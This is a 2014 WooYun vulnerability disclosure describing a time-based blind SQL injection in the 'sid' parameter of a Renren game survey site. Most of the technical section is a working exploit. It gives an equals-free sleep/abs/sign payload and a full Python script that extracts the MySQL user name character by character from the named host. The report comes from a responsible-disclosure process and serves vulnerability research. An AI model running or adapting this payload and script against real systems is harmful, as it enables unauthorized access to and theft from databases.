人人网分站MySQL注射(不带等号注入,附验证脚本)

编号86516
Urlhttp://www.wooyun.org/bug.php?action=view&id=86516
漏洞状态厂商已经确认
漏洞标题人人网分站MySQL注射(不带等号注入,附验证脚本)
漏洞类型SQL注射漏洞
厂商人人网
白帽子lijiejie
提交日期2014-12-09 15:12:00
公开日期2015-01-23 15:14:00
修复时间(not set)
确认时间2014-12-09 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank6
厂商评级
厂商评rank7
漏洞简介
人人网分站SQL注射修复不完整,可以不带等号注入,附验证脚本
漏洞细节

注入点:

http://survey.game.renren.com/index.php?sid=28299


参数sid可注入。
wooyun上已有报告了,但未能正确修复。

POC

通过sleep函数来猜解单个字符:
sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s)))
每次取一个字符的ascii码,与列表中的ascii码逐一对比,取符号的绝对值。
如果相等,则符号是0,绝对值是0,会延迟。
若不等,则符号是1或-1,绝对值为1,不延迟。
猜解user(),得到:

[email protected]


renren.com_1.png


脚本:

#encoding=gbk
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'Cookie': '',
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
for i in range(0,10):
payloads.append(str(i))
payloads += ['@','_', '.']
print 'start to retrive MySQL user:'
user = ''
for i in range(1,20):
for payload in payloads:
conn = httplib.HTTPConnection('survey.game.renren.com', timeout=60)
s = '28299 and sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s)))' % (i, ord(payload))
conn.request(method='GET',
url='/index.php?sid='+urllib.quote(s),
headers=headers)
start_time = time.time()
conn.getresponse().read().decode('utf-8')
if time.time() - start_time > 1.0:
user += payload
print '\n[in progress]', user
break
else:
print '.',
print '\nMySQL user is', user

修复方案

强制转换,过滤

状态信息 2014-12-09: 细节已通知厂商并且等待厂商处理中
2014-12-09: 厂商已经确认,细节仅向厂商公开
2014-12-19: 细节向核心白帽子及相关领域专家公开
2014-12-29: 细节向普通白帽子公开
2015-01-08: 细节向实习白帽子公开
2015-01-23: 细节向公众公开
厂商回复非常感谢
回应信息危害等级:中漏洞Rank:7 确认时间:2014-12-09 15:29
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

like啊 不带等号

xsser02014-12-09 15:41:00